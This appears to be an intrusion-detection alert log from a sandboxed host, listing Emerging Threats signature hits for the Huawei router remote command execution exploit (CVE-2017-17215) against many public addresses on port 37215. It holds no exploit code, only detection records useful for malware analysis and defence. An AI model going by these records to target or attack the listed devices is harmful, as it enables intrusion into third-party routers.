                                                    07/10/24-08:27:05.058899TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4372837215192.168.2.1441.94.254.73
                                                    07/10/24-08:27:28.169608TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5832437215192.168.2.14197.99.237.126
                                                    07/10/24-08:26:49.809017TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3940437215192.168.2.14157.243.135.136
                                                    07/10/24-08:26:55.296464TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4901237215192.168.2.14197.238.236.252
                                                    07/10/24-08:27:17.109836TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3621237215192.168.2.1465.232.175.92
                                                    07/10/24-08:26:20.190531TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5052837215192.168.2.1441.215.152.72
                                                    07/10/24-08:26:20.178441TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4317837215192.168.2.14157.112.229.220
                                                    07/10/24-08:26:36.357123TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5968237215192.168.2.14157.69.161.61
                                                    07/10/24-08:26:43.910396TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5359837215192.168.2.14197.208.239.132
                                                    07/10/24-08:27:10.638675TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4987837215192.168.2.14157.16.204.60
                                                    07/10/24-08:26:29.860242TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5003437215192.168.2.14197.125.74.194
                                                    07/10/24-08:27:33.768377TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4595037215192.168.2.14197.82.198.242
                                                    07/10/24-08:26:28.822867TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5287437215192.168.2.14197.211.36.125
                                                    07/10/24-08:26:38.588104TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4772837215192.168.2.14197.221.195.99
                                                    07/10/24-08:27:13.987443TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3338237215192.168.2.14157.127.251.10
                                                    07/10/24-08:27:19.271141TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3510037215192.168.2.1441.208.180.203
                                                    07/10/24-08:27:02.743093TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4894037215192.168.2.1441.13.13.181
                                                    07/10/24-08:27:30.549357TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5865637215192.168.2.14108.48.233.15
                                                    07/10/24-08:27:19.234449TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5132437215192.168.2.1441.164.127.114
                                                    07/10/24-08:26:43.848848TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3762237215192.168.2.1499.251.238.3
                                                    07/10/24-08:26:45.588243TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4846837215192.168.2.1441.255.171.49
                                                    07/10/24-08:27:19.352801TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4851437215192.168.2.1441.83.104.101
                                                    07/10/24-08:26:13.647460TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3676437215192.168.2.1441.252.153.32
                                                    07/10/24-08:27:31.479319TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3618237215192.168.2.1441.98.59.109
                                                    07/10/24-08:27:05.207255TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4490837215192.168.2.1441.3.170.67
                                                    07/10/24-08:27:05.077820TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5431837215192.168.2.14157.151.176.134
                                                    07/10/24-08:27:27.100139TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6008437215192.168.2.14157.192.211.136
                                                    07/10/24-08:27:13.982789TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4788637215192.168.2.14197.170.215.173
                                                    07/10/24-08:27:28.131981TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4730237215192.168.2.14174.126.85.252
                                                    07/10/24-08:27:10.674109TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3716437215192.168.2.1496.195.82.201
                                                    07/10/24-08:26:42.463708TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4491037215192.168.2.1473.120.199.6
                                                    07/10/24-08:27:19.160645TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3434437215192.168.2.14197.224.226.52
                                                    07/10/24-08:26:43.730501TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3317837215192.168.2.1441.105.76.16
                                                    07/10/24-08:26:49.810296TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5709637215192.168.2.14157.108.124.186
                                                    07/10/24-08:26:29.871003TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4373837215192.168.2.14175.148.96.207
                                                    07/10/24-08:27:13.891994TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5953237215192.168.2.1441.75.165.39
                                                    07/10/24-08:26:14.624434TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3506637215192.168.2.14157.195.156.138
                                                    07/10/24-08:27:20.460013TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4682837215192.168.2.1441.250.145.191
                                                    07/10/24-08:26:13.759189TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4396437215192.168.2.14157.204.28.132
                                                    07/10/24-08:27:22.922579TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4131037215192.168.2.14157.222.126.78
                                                    07/10/24-08:26:13.805292TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4644437215192.168.2.14175.196.176.13
                                                    07/10/24-08:26:57.505236TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3531237215192.168.2.1441.229.249.194
                                                    07/10/24-08:27:07.362025TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3717837215192.168.2.14197.149.130.235
                                                    07/10/24-08:26:11.119268TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4994837215192.168.2.1441.235.118.49
                                                    07/10/24-08:27:31.547528TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4608237215192.168.2.14197.204.12.69
                                                    07/10/24-08:27:08.389862TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4999637215192.168.2.1441.190.25.201
                                                    07/10/24-08:27:20.483552TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4487637215192.168.2.1493.210.71.59
                                                    07/10/24-08:27:31.565038TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5032037215192.168.2.14157.77.71.173
                                                    07/10/24-08:27:24.949781TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4095637215192.168.2.14197.209.150.127
                                                    07/10/24-08:26:28.728876TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4599837215192.168.2.14197.231.230.142
                                                    07/10/24-08:27:02.918054TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4586437215192.168.2.142.197.29.32
                                                    07/10/24-08:26:33.227132TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3355637215192.168.2.1441.46.185.165
                                                    07/10/24-08:27:22.783603TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5859637215192.168.2.1441.242.160.155
                                                    07/10/24-08:27:27.085141TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5986637215192.168.2.1441.238.86.160
                                                    07/10/24-08:26:28.900792TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5799037215192.168.2.148.145.242.31
                                                    07/10/24-08:27:32.553741TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3309437215192.168.2.1441.159.38.43
                                                    07/10/24-08:27:10.679759TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4969237215192.168.2.14152.34.71.38
                                                    07/10/24-08:27:13.822075TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4321637215192.168.2.14170.110.50.13
                                                    07/10/24-08:27:02.883243TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5159037215192.168.2.1441.8.178.52
                                                    07/10/24-08:26:57.595763TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4168237215192.168.2.14156.97.70.79
                                                    07/10/24-08:27:28.154911TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3353837215192.168.2.14197.23.186.51
                                                    07/10/24-08:26:22.287695TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3697037215192.168.2.14168.49.177.30
                                                    07/10/24-08:27:17.111438TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5714237215192.168.2.144.198.157.81
                                                    07/10/24-08:27:20.425119TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4739237215192.168.2.1441.172.51.102
                                                    07/10/24-08:26:15.861414TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5427837215192.168.2.14197.107.129.34
                                                    07/10/24-08:26:49.921267TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5937637215192.168.2.14197.103.75.51
                                                    07/10/24-08:27:02.833668TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3867637215192.168.2.14157.59.166.85
                                                    07/10/24-08:26:38.578082TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3506437215192.168.2.14157.176.104.164
                                                    07/10/24-08:27:19.146990TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3942437215192.168.2.14189.228.58.8
                                                    07/10/24-08:27:11.564207TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3362837215192.168.2.14197.189.200.39
                                                    07/10/24-08:26:26.483995TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4447837215192.168.2.14157.223.119.71
                                                    07/10/24-08:26:47.966709TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5970837215192.168.2.14157.82.87.97
                                                    07/10/24-08:27:31.486586TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5738837215192.168.2.14155.60.149.37
                                                    07/10/24-08:26:11.525491TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5408237215192.168.2.14197.56.126.122
                                                    07/10/24-08:26:22.289116TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4409237215192.168.2.1441.41.159.84
                                                    07/10/24-08:26:20.160922TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3420637215192.168.2.1441.190.180.95
                                                    07/10/24-08:26:29.757502TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6008037215192.168.2.14197.64.17.244
                                                    07/10/24-08:27:19.282897TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5387237215192.168.2.14157.95.84.63
                                                    07/10/24-08:27:22.936738TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3986837215192.168.2.14211.185.86.45
                                                    07/10/24-08:27:30.518988TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5722437215192.168.2.14102.73.185.27
                                                    07/10/24-08:26:25.507249TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4317037215192.168.2.14139.105.154.111
                                                    07/10/24-08:27:27.050359TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5083037215192.168.2.14157.144.134.201
                                                    07/10/24-08:26:23.320744TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5706437215192.168.2.1441.189.60.9
                                                    07/10/24-08:27:19.343044TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5358437215192.168.2.1441.71.61.223
                                                    07/10/24-08:26:25.460773TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4012037215192.168.2.14204.34.169.70
                                                    07/10/24-08:27:23.501792TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4053037215192.168.2.1441.122.37.215
                                                    07/10/24-08:26:25.464984TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5682237215192.168.2.1441.83.130.224
                                                    07/10/24-08:27:14.830052TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4165837215192.168.2.1441.195.134.5
                                                    07/10/24-08:26:48.015803TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5349637215192.168.2.14157.184.139.44
                                                    07/10/24-08:26:14.827128TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3338837215192.168.2.1443.223.71.171
                                                    07/10/24-08:26:15.867031TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5333237215192.168.2.1441.100.152.217
                                                    07/10/24-08:26:23.351340TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3722837215192.168.2.14157.149.20.109
                                                    07/10/24-08:27:13.977821TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4549637215192.168.2.14197.31.200.2
                                                    07/10/24-08:26:29.826099TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5345037215192.168.2.14157.94.75.226
                                                    07/10/24-08:27:34.127270TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5014837215192.168.2.14157.247.127.209
                                                    07/10/24-08:27:22.848965TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3992237215192.168.2.14197.58.108.85
                                                    07/10/24-08:26:52.001475TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4353637215192.168.2.14157.153.227.49
                                                    07/10/24-08:27:33.980422TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3478837215192.168.2.14192.191.239.26
                                                    07/10/24-08:27:13.964289TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4405437215192.168.2.1474.154.50.44
                                                    07/10/24-08:26:43.655198TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5832237215192.168.2.1441.225.174.241
                                                    07/10/24-08:26:17.984415TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5352037215192.168.2.1441.160.243.104
                                                    07/10/24-08:26:55.360026TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4764437215192.168.2.1441.69.227.21
                                                    07/10/24-08:26:22.234679TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5366837215192.168.2.1441.75.101.180
                                                    07/10/24-08:27:05.238530TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3769837215192.168.2.14157.203.138.216
                                                    07/10/24-08:27:33.723492TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5844037215192.168.2.14177.133.235.21
                                                    07/10/24-08:26:20.168869TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3371237215192.168.2.14157.240.201.45
                                                    07/10/24-08:26:57.625534TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3731437215192.168.2.14179.141.62.220
                                                    07/10/24-08:27:31.550771TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5267437215192.168.2.14197.149.254.206
                                                    07/10/24-08:26:34.196172TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5178637215192.168.2.14197.175.11.204
                                                    07/10/24-08:27:22.784576TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4154237215192.168.2.1441.15.139.250
                                                    07/10/24-08:27:23.912574TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5487437215192.168.2.14197.152.218.26
                                                    07/10/24-08:26:55.442446TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5909237215192.168.2.14157.119.65.38
                                                    07/10/24-08:27:03.002542TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4064837215192.168.2.1441.232.136.129
                                                    07/10/24-08:27:07.382774TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6050637215192.168.2.14197.85.226.142
                                                    07/10/24-08:26:29.883547TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3366437215192.168.2.1452.134.188.68
                                                    07/10/24-08:27:07.349676TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4190437215192.168.2.14197.20.251.41
                                                    07/10/24-08:27:05.156070TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5145437215192.168.2.14157.175.166.11
                                                    07/10/24-08:27:20.460013TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4287837215192.168.2.14197.54.110.129
                                                    07/10/24-08:27:27.136421TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3499437215192.168.2.14157.124.29.112
                                                    07/10/24-08:26:59.615141TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5985437215192.168.2.1441.180.104.155
                                                    07/10/24-08:27:33.810872TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4863037215192.168.2.14197.86.98.68
                                                    07/10/24-08:26:11.178484TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5685237215192.168.2.14157.144.212.156
                                                    07/10/24-08:26:59.541812TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4156037215192.168.2.1441.90.115.32
                                                    07/10/24-08:27:30.532382TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4099037215192.168.2.14157.113.205.32
                                                    07/10/24-08:26:25.499192TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4810837215192.168.2.1441.45.14.248
                                                    07/10/24-08:27:03.001228TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5154637215192.168.2.14157.93.50.190
                                                    07/10/24-08:27:23.849464TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5174237215192.168.2.14208.51.219.140
                                                    07/10/24-08:27:10.617343TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4216037215192.168.2.14157.105.84.149
                                                    07/10/24-08:27:33.865886TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6036837215192.168.2.144.156.176.92
                                                    07/10/24-08:26:15.820169TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5331437215192.168.2.14157.8.84.203
                                                    07/10/24-08:27:10.751159TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6037237215192.168.2.1441.125.29.25
                                                    07/10/24-08:26:13.822252TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3984637215192.168.2.14197.116.176.174
                                                    07/10/24-08:27:31.550771TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3545037215192.168.2.1441.52.64.162
                                                    07/10/24-08:26:53.161125TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3852237215192.168.2.1475.91.255.77
                                                    07/10/24-08:26:18.006085TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3774637215192.168.2.1441.239.74.122
                                                    07/10/24-08:26:57.536379TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5022237215192.168.2.1481.165.133.157
                                                    07/10/24-08:27:08.410834TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4887637215192.168.2.14197.212.250.113
                                                    07/10/24-08:27:14.828457TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5831437215192.168.2.14157.174.165.174
                                                    07/10/24-08:26:18.008254TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4900237215192.168.2.1418.45.24.163
                                                    07/10/24-08:26:18.030544TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5082837215192.168.2.14197.230.240.229
                                                    07/10/24-08:26:53.197285TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3862437215192.168.2.14197.91.126.82
                                                    07/10/24-08:27:02.864338TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5764037215192.168.2.14157.53.191.72
                                                    07/10/24-08:27:19.326133TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3382237215192.168.2.1441.199.103.145
                                                    07/10/24-08:26:41.440353TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5188037215192.168.2.1441.100.129.99
                                                    07/10/24-08:27:22.527598TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4218237215192.168.2.14197.99.222.252
                                                    07/10/24-08:26:28.723729TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3469637215192.168.2.14157.146.1.171
                                                    07/10/24-08:26:57.623347TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5316637215192.168.2.1480.245.133.238
                                                    07/10/24-08:26:14.829275TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5585437215192.168.2.14157.162.214.168
                                                    07/10/24-08:27:11.533117TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4978237215192.168.2.14197.210.91.192
                                                    07/10/24-08:26:42.419623TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3725837215192.168.2.1441.52.207.222
                                                    07/10/24-08:27:33.744023TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4738837215192.168.2.14197.87.85.146
                                                    07/10/24-08:27:20.512534TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3570437215192.168.2.14120.233.7.113
                                                    07/10/24-08:26:17.957871TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3349037215192.168.2.1441.12.21.232
                                                    07/10/24-08:26:47.854499TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5951637215192.168.2.1441.222.138.200
                                                    07/10/24-08:27:20.401175TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4386437215192.168.2.14220.129.221.188
                                                    07/10/24-08:27:32.622177TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5861437215192.168.2.14157.226.17.22
                                                    07/10/24-08:26:34.236925TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4470437215192.168.2.1447.140.183.33
                                                    07/10/24-08:26:28.648107TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3682237215192.168.2.1424.71.190.65
                                                    07/10/24-08:27:36.290349TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4968237215192.168.2.1467.28.184.27
                                                    07/10/24-08:26:49.805263TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3926437215192.168.2.14179.121.7.49
                                                    07/10/24-08:26:31.106544TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4574837215192.168.2.14181.130.81.217
                                                    07/10/24-08:27:07.376738TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4673237215192.168.2.14157.152.62.241
                                                    07/10/24-08:27:08.446106TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4125637215192.168.2.14197.15.215.233
                                                    07/10/24-08:26:11.127756TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3727237215192.168.2.14197.238.249.245
                                                    07/10/24-08:26:33.204295TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3967037215192.168.2.1441.192.10.86
                                                    07/10/24-08:26:47.860758TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4482237215192.168.2.14197.130.59.13
                                                    07/10/24-08:27:22.936738TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4772637215192.168.2.14157.225.66.105
                                                    07/10/24-08:27:19.193272TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4997237215192.168.2.14197.6.171.248
                                                    07/10/24-08:27:30.487311TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3305237215192.168.2.1441.120.112.131
                                                    07/10/24-08:27:10.621060TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4025437215192.168.2.1441.132.76.205
                                                    07/10/24-08:27:27.169411TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5960437215192.168.2.14157.95.89.24
                                                    07/10/24-08:26:41.598606TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5114237215192.168.2.1441.87.5.255
                                                    07/10/24-08:26:53.177633TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5752237215192.168.2.14157.241.222.142
                                                    07/10/24-08:26:53.198368TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5223037215192.168.2.14197.155.218.132
                                                    07/10/24-08:27:24.878346TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4781237215192.168.2.1441.206.249.51
                                                    07/10/24-08:26:23.317114TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5802437215192.168.2.1441.184.129.25
                                                    07/10/24-08:26:29.861984TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3309637215192.168.2.1436.78.79.20
                                                    07/10/24-08:26:49.805818TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4828237215192.168.2.14157.154.101.80
                                                    07/10/24-08:26:38.558998TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3826437215192.168.2.14157.102.37.163
                                                    07/10/24-08:27:10.625884TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3477637215192.168.2.1452.169.109.139
                                                    07/10/24-08:26:41.499306TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5635037215192.168.2.14197.202.226.9
                                                    07/10/24-08:26:38.575059TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5164037215192.168.2.14157.249.55.71
                                                    07/10/24-08:27:17.093550TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4608037215192.168.2.1487.194.252.7
                                                    07/10/24-08:26:38.546157TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4312437215192.168.2.1441.7.184.68
                                                    07/10/24-08:26:13.758860TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5973037215192.168.2.14176.12.104.181
                                                    07/10/24-08:26:14.809030TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3548637215192.168.2.1441.134.114.30
